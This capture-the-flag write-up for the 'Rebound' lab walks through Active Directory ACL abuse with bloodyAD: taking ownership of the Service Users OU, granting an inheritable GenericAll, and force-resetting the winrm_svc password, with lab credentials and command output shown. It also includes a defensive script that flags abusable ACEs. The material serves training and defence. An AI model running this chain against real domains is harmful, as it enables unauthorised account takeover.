OU


After discovering that the WRITE_VALIDATED (Self-Membership) right effectively lets the oorend user add themself to the ServiceMgmt group, I continued the domain enumeration.

┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb get children 'DC=rebound,DC=htb' --type organizationalUnit
 
distinguishedname: OU=Service Users,DC=rebound,DC=htb
 
distinguishedname: OU=Domain Controllers,DC=rebound,DC=htb

BloodyAD returns two OUs from the target domain: Service Users and Domain Controllers. Both are new findings, since neither showed up in the earlier BloodHound enumeration.

While the Domain Controllers OU appears to be the generic default one, the Service Users OU is worth a closer look.

┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ bloodyAD -d rebound.htb -u ldap_monitor -p '1GR8t@$$4u' --host dc01.rebound.htb get children 'OU=Service Users,DC=rebound,DC=htb' 
 
distinguishedname: CN=batch_runner,OU=Service Users,DC=rebound,DC=htb
 
distinguishedname: CN=winrm_svc,OU=Service Users,DC=rebound,DC=htb

The Service Users OU contains two users: batch_runner and winrm_svc. Both domain users were already enumerated in the earlier BloodHound session. The winrm_svc account is the obvious candidate for a foothold, since it is a member of the Remote Management Users group.

Now I will check the ACL of the Service Users OU.

┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb get object 'OU=Service Users,DC=rebound,DC=htb' --resolve-sd
 
distinguishedname: OU=Service Users,DC=rebound,DC=htb
dscorepropagationdata: 2023-09-11 13:11:06+00:00; 2023-09-11 13:11:01+00:00; 2023-09-11 13:04:07+00:00; 2023-09-11 13:04:01+00:00; 1601-01-01 00:00:00+00:00
instancetype: 4
ntsecuritydescriptor.owner: Domain Admins
ntsecuritydescriptor.control: DACL_AUTO_INHERITED|DACL_PRESENT|SACL_AUTO_INHERITED|SELF_RELATIVE
ntsecuritydescriptor.acl.0.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.0.trustee: ACCOUNT_OPERATORS
ntsecuritydescriptor.acl.0.right: DELETE_CHILD|CREATE_CHILD
ntsecuritydescriptor.acl.0.objecttype: Computer; inetOrgPerson; User; Group
ntsecuritydescriptor.acl.1.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.1.trustee: PRINTER_OPERATORS
ntsecuritydescriptor.acl.1.right: DELETE_CHILD|CREATE_CHILD
ntsecuritydescriptor.acl.1.objecttype: Print-Queue
ntsecuritydescriptor.acl.2.type: == ALLOWED ==
ntsecuritydescriptor.acl.2.trustee: Domain Admins; LOCAL_SYSTEM; ServiceMgmt
ntsecuritydescriptor.acl.2.right: GENERIC_ALL
ntsecuritydescriptor.acl.2.objecttype: Self
ntsecuritydescriptor.acl.3.type: == ALLOWED ==
ntsecuritydescriptor.acl.3.trustee: ENTERPRISE_DOMAIN_CONTROLLERS; AUTHENTICATED_USERS
ntsecuritydescriptor.acl.3.right: GENERIC_READ
ntsecuritydescriptor.acl.3.objecttype: Self
ntsecuritydescriptor.acl.4.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.4.trustee: ALIAS_PREW2KCOMPACC
ntsecuritydescriptor.acl.4.right: READ_PROP
ntsecuritydescriptor.acl.4.objecttype: Account-Restrictions; Group-Membership; Logon-Information; General-Information; Remote-Access-Information
ntsecuritydescriptor.acl.4.inheritedobjecttype: inetOrgPerson; User
ntsecuritydescriptor.acl.4.flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
ntsecuritydescriptor.acl.5.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.5.trustee: Enterprise Key Admins; Key Admins
ntsecuritydescriptor.acl.5.right: WRITE_PROP|READ_PROP
ntsecuritydescriptor.acl.5.objecttype: ms-DS-Key-Credential-Link
ntsecuritydescriptor.acl.5.flags: CONTAINER_INHERIT; INHERITED
ntsecuritydescriptor.acl.6.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.6.trustee: PRINCIPAL_SELF; CREATOR_OWNER
ntsecuritydescriptor.acl.6.right: WRITE_VALIDATED
ntsecuritydescriptor.acl.6.objecttype: DS-Validated-Write-Computer
ntsecuritydescriptor.acl.6.inheritedobjecttype: Computer
ntsecuritydescriptor.acl.6.flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
ntsecuritydescriptor.acl.7.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.7.trustee: ENTERPRISE_DOMAIN_CONTROLLERS
ntsecuritydescriptor.acl.7.right: READ_PROP
ntsecuritydescriptor.acl.7.objecttype: Token-Groups
ntsecuritydescriptor.acl.7.inheritedobjecttype: Computer; User; Group
ntsecuritydescriptor.acl.7.flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
ntsecuritydescriptor.acl.8.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.8.trustee: PRINCIPAL_SELF
ntsecuritydescriptor.acl.8.right: WRITE_PROP
ntsecuritydescriptor.acl.8.objecttype: ms-TPM-Tpm-Information-For-Computer
ntsecuritydescriptor.acl.8.inheritedobjecttype: Computer
ntsecuritydescriptor.acl.8.flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
ntsecuritydescriptor.acl.9.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.9.trustee: ALIAS_PREW2KCOMPACC
ntsecuritydescriptor.acl.9.right: GENERIC_READ
ntsecuritydescriptor.acl.9.objecttype: Self
ntsecuritydescriptor.acl.9.inheritedobjecttype: inetOrgPerson; User; Group
ntsecuritydescriptor.acl.9.flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
ntsecuritydescriptor.acl.10.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.10.trustee: PRINCIPAL_SELF
ntsecuritydescriptor.acl.10.right: WRITE_PROP|READ_PROP
ntsecuritydescriptor.acl.10.objecttype: ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity
ntsecuritydescriptor.acl.10.flags: CONTAINER_INHERIT; INHERITED; OBJECT_INHERIT
ntsecuritydescriptor.acl.11.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.11.trustee: PRINCIPAL_SELF
ntsecuritydescriptor.acl.11.right: CONTROL_ACCESS|WRITE_PROP|READ_PROP
ntsecuritydescriptor.acl.11.objecttype: Private-Information
ntsecuritydescriptor.acl.11.flags: CONTAINER_INHERIT; INHERITED
ntsecuritydescriptor.acl.12.type: == ALLOWED ==
ntsecuritydescriptor.acl.12.trustee: Enterprise Admins
ntsecuritydescriptor.acl.12.right: GENERIC_ALL
ntsecuritydescriptor.acl.12.objecttype: Self
ntsecuritydescriptor.acl.12.flags: CONTAINER_INHERIT; INHERITED
ntsecuritydescriptor.acl.13.type: == ALLOWED ==
ntsecuritydescriptor.acl.13.trustee: ALIAS_PREW2KCOMPACC
ntsecuritydescriptor.acl.13.right: LIST_CHILD
ntsecuritydescriptor.acl.13.objecttype: Self
ntsecuritydescriptor.acl.13.flags: CONTAINER_INHERIT; INHERITED
ntsecuritydescriptor.acl.14.type: == ALLOWED ==
ntsecuritydescriptor.acl.14.trustee: BUILTIN_ADMINISTRATORS
ntsecuritydescriptor.acl.14.right: WRITE_OWNER|WRITE_DACL|GENERIC_READ|DELETE|CONTROL_ACCESS|WRITE_PROP|WRITE_VALIDATED|CREATE_CHILD
ntsecuritydescriptor.acl.14.objecttype: Self
ntsecuritydescriptor.acl.14.flags: CONTAINER_INHERIT; INHERITED
name: Service Users
objectcategory: CN=Organizational-Unit,CN=Schema,CN=Configuration,DC=rebound,DC=htb
objectclass: top; organizationalUnit
objectguid: {fc826af9-06f9-47e7-866e-4c3c015638b8}
ou: Service Users
usnchanged: 170082
usncreated: 69325
whenchanged: 2023-09-11 13:11:06+00:00
whencreated: 2023-04-08 09:07:56+00:00

It took a while to review each line thoroughly, but eventually I identified the Access Control Entry (ACE) that I can potentially exploit.
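Reviewing a dump like the one above line by line is tedious, so the following is an added example (not from the original write-up and not bloodyAD's own code) that parses the `--resolve-sd` output and flags ACEs granting takeover or write rights to trustees outside a list of expected administrative principals. That list and the takeover/write classification of rights are this script's own assumptions. The two sample dumps embedded in it are trimmed copies of the OU output above and of the post-modification output further down the page. It also reports each ACE's inheritance scope, which is what separates the original ServiceMgmt entry (OU object only, no inheritance flags) from an inheritable entry that reaches the user objects inside the OU.

```python
"""Triage a bloodyAD `get object --resolve-sd` dump for abusable ACEs.

Added example: not part of the original write-up and not bloodyAD code.
The sample dumps are trimmed copies of the OU output shown in the post;
which trustees are "expected" and which rights count as takeover/write
are this script's own assumptions.
"""
import re
from dataclasses import dataclass, field

# Assumption: these trustees are expected to hold wide rights everywhere.
EXPECTED_TRUSTEES = {
    "Domain Admins", "Enterprise Admins", "LOCAL_SYSTEM", "BUILTIN_ADMINISTRATORS",
    "ENTERPRISE_DOMAIN_CONTROLLERS", "Key Admins", "Enterprise Key Admins",
    "PRINCIPAL_SELF", "CREATOR_OWNER",  # only matter once you own that object
}
TAKEOVER_RIGHTS = {"GENERIC_ALL", "GENERIC_WRITE", "WRITE_DACL", "WRITE_OWNER"}
WRITE_RIGHTS = {"WRITE_PROP", "CONTROL_ACCESS", "CREATE_CHILD", "DELETE_CHILD"}

ACE_LINE = re.compile(r"^ntsecuritydescriptor\.acl\.(\d+)\.(\w+): (.*)$")
OWNER_LINE = re.compile(r"^ntsecuritydescriptor\.owner: (.*)$")


@dataclass
class Ace:
    index: int
    type: str = ""
    trustees: list = field(default_factory=list)
    rights: set = field(default_factory=set)
    inherited_object_types: list = field(default_factory=list)
    flags: set = field(default_factory=set)


def _split(value, sep):
    return [v.strip() for v in value.split(sep) if v.strip()]


def parse_security_descriptor(dump):
    """Return (owner, [Ace, ...]) from the text bloodyAD prints with --resolve-sd."""
    owner, aces = None, {}
    for line in dump.splitlines():
        line = line.strip()
        if m := OWNER_LINE.match(line):
            owner = m.group(1).strip()
            continue
        if not (m := ACE_LINE.match(line)):
            continue
        idx, key, value = int(m.group(1)), m.group(2), m.group(3)
        ace = aces.setdefault(idx, Ace(idx))
        if key == "type":
            ace.type = value.strip("= ")          # "== ALLOWED ==" -> "ALLOWED"
        elif key == "trustee":
            ace.trustees = _split(value, ";")
        elif key == "right":
            ace.rights = set(_split(value, "|"))
        elif key == "inheritedobjecttype":
            ace.inherited_object_types = _split(value, ";")
        elif key == "flags":
            ace.flags = set(_split(value, ";"))
    return owner, [aces[i] for i in sorted(aces)]


def ace_scope(ace):
    """Say what the ACE covers. No flags at all means a non-inherited ACE on the
    object itself only; that is the ServiceMgmt GENERIC_ALL case, which is why it
    grants nothing on the users under the OU until an inheritable ACE is added."""
    if not ace.flags:
        return "this object only"
    parts = []
    if "INHERIT_ONLY" not in ace.flags:
        parts.append("this object")
    if ace.flags & {"CONTAINER_INHERIT", "OBJECT_INHERIT"}:
        parts.append("children (%s)" % (", ".join(ace.inherited_object_types) or "all"))
    suffix = " [inherited from a parent]" if "INHERITED" in ace.flags else ""
    return " and ".join(parts) + suffix


def triage(aces):
    """ALLOW ACEs that hand takeover or write rights to a trustee not in
    EXPECTED_TRUSTEES, most severe first. Each finding is a dict."""
    findings = []
    for ace in aces:
        if not ace.type.startswith("ALLOWED"):
            continue
        trustees = [t for t in ace.trustees if t not in EXPECTED_TRUSTEES]
        if not trustees:
            continue
        if ace.rights & TAKEOVER_RIGHTS:
            severity = "takeover"
        elif ace.rights & WRITE_RIGHTS:
            severity = "write"
        else:
            continue
        findings.append({"ace": ace.index, "trustees": trustees, "severity": severity,
                         "rights": sorted(ace.rights), "scope": ace_scope(ace)})
    findings.sort(key=lambda f: (f["severity"] != "takeover", f["ace"]))
    return findings


# Trimmed from the dump of OU=Service Users before any changes (page data).
BEFORE = """\
ntsecuritydescriptor.owner: Domain Admins
ntsecuritydescriptor.acl.0.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.0.trustee: ACCOUNT_OPERATORS
ntsecuritydescriptor.acl.0.right: DELETE_CHILD|CREATE_CHILD
ntsecuritydescriptor.acl.2.type: == ALLOWED ==
ntsecuritydescriptor.acl.2.trustee: Domain Admins; LOCAL_SYSTEM; ServiceMgmt
ntsecuritydescriptor.acl.2.right: GENERIC_ALL
ntsecuritydescriptor.acl.4.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.4.trustee: ALIAS_PREW2KCOMPACC
ntsecuritydescriptor.acl.4.right: READ_PROP
ntsecuritydescriptor.acl.4.inheritedobjecttype: inetOrgPerson; User
ntsecuritydescriptor.acl.4.flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
ntsecuritydescriptor.acl.14.type: == ALLOWED ==
ntsecuritydescriptor.acl.14.trustee: BUILTIN_ADMINISTRATORS
ntsecuritydescriptor.acl.14.right: WRITE_OWNER|WRITE_DACL|GENERIC_READ|DELETE|CONTROL_ACCESS|WRITE_PROP|WRITE_VALIDATED|CREATE_CHILD
ntsecuritydescriptor.acl.14.flags: CONTAINER_INHERIT; INHERITED
"""

# Trimmed from the dump after `set owner` and `add genericAll` (page data).
AFTER = """\
ntsecuritydescriptor.owner: oorend
ntsecuritydescriptor.acl.3.type: == ALLOWED ==
ntsecuritydescriptor.acl.3.trustee: oorend
ntsecuritydescriptor.acl.3.right: GENERIC_ALL
ntsecuritydescriptor.acl.3.flags: CONTAINER_INHERIT; OBJECT_INHERIT
"""

if __name__ == "__main__":
    for label, dump in (("before", BEFORE), ("after", AFTER)):
        owner, aces = parse_security_descriptor(dump)
        print(f"[{label}] owner: {owner}")
        for f in triage(aces):
            print(f"  ACE {f['ace']}: {f['severity']:8} {', '.join(f['trustees'])} "
                  f"-> {'|'.join(f['rights'])} on {f['scope']}")
```

Run it against a full dump saved from bloodyAD (replace `BEFORE` with the file contents) and it lists the ServiceMgmt GENERIC_ALL entry as a takeover finding scoped to the OU object only, and the ACCOUNT_OPERATORS create/delete-child entry as a write finding; everything granted to the expected administrative trustees or to PRINCIPAL_SELF is suppressed.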

GENERIC ALL


It's this one: GENERIC_ALL. ACE 2 on the Service Users OU grants the ServiceMgmt group GENERIC_ALL on the OU object itself. Note that this ACE carries no inheritance flags, so on its own it applies to the OU and not to the user objects beneath it.

GENERIC_ALL also includes WRITE_DACL and WRITE_OWNER, so the OU's security descriptor itself can be rewritten: the owner can be changed and new ACEs, including inheritable ones that propagate to the child objects, can be added.

There are many ways to abuse GENERIC_ALL. Since the winrm_svc account appears to be the direct route to a foothold, I will reset that user's password.

WriteOwner


┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb set owner 'OU=Service Users,DC=rebound,DC=htb' oorend
[+] Old owner S-1-5-21-4078382237-1492182817-2568127209-512 is now replaced by oorend on OU=Service Users,DC=rebound,DC=htb

First I make oorend the owner of the Service Users OU. Ownership implicitly carries READ_CONTROL and WRITE_DACL, so oorend can then grant themself rights directly on the OU rather than relying on the transitive privilege that comes with ServiceMgmt membership.

Old owner?


┌──(Kerberoasting_with_no_preauth)─(kali㉿kali)-[~/…/htb/labs/rebound/ldapdomaindump]
└─$ rpcclient $IP -N -U 'oorend%1GR8t@$$4u'
rpcclient $> lookupsids S-1-5-21-4078382237-1492182817-2568127209-512
S-1-5-21-4078382237-1492182817-2568127209-512 rebound\Domain Admins (2)

That old owner, S-1-5-21-4078382237-1492182817-2568127209-512, was the rebound\Domain Admins group (RID 512 is the well-known RID of Domain Admins), which matches the ntsecuritydescriptor.owner value seen before the change.

Generic All


┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb add genericAll 'OU=Service Users,DC=rebound,DC=htb' oorend 
[+] oorend has now GenericAll on OU=Service Users,DC=rebound,DC=htb

Now that oorend owns the Service Users OU, I can grant the user GenericAll on it.

┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb get object 'OU=Service Users,DC=rebound,DC=htb' --resolve-sd
 
distinguishedname: OU=Service Users,DC=rebound,DC=htb
instancetype: 4
ntsecuritydescriptor.owner: oorend
 
ntsecuritydescriptor.acl.2.type: == ALLOWED ==
ntsecuritydescriptor.acl.2.trustee: Domain Admins; LOCAL_SYSTEM; ServiceMgmt
ntsecuritydescriptor.acl.2.right: GENERIC_ALL
ntsecuritydescriptor.acl.2.objecttype: Self
ntsecuritydescriptor.acl.3.type: == ALLOWED ==
ntsecuritydescriptor.acl.3.trustee: oorend
ntsecuritydescriptor.acl.3.right: GENERIC_ALL
ntsecuritydescriptor.acl.3.objecttype: Self
ntsecuritydescriptor.acl.3.flags: CONTAINER_INHERIT; OBJECT_INHERIT
 
[...REDACTED...]
 
ou: Service Users

It's confirmed: ACE 3 now grants oorend GENERIC_ALL with CONTAINER_INHERIT and OBJECT_INHERIT set, so unlike the original ServiceMgmt entry it propagates to the user objects inside the OU.

Password Reset


┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ bloodyAD set password --help
usage: bloodyAD set password [-h] [--oldpass OLDPASS] target newpass
 
positional arguments:
  target             sAMAccountName, DN, GUID or SID of the target
  newpass            new password for the target
 
options:
  -h, --help         show this help message and exit
  --oldpass OLDPASS  old password of the target, mandatory if you don't have "change password" permission
                     on the target (default: None)

BloodyAD natively supports password resets as well. Without --oldpass it performs an administrative reset, which requires the User-Force-Change-Password extended right (or GENERIC_ALL) on the target rather than knowledge of the current password.

┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb set password 'CN=winrm_svc,OU=Service Users,DC=rebound,DC=htb' Qwer1234
[+] Password changed successfully!

Done. The password of the winrm_svc account is now Qwer1234, so I should be able to authenticate to the target WinRM service with winrm_svc:Qwer1234. A forced reset is not silent, though: the old password is gone, so anything that used it breaks, and the DC logs the reset attempt (event ID 4724).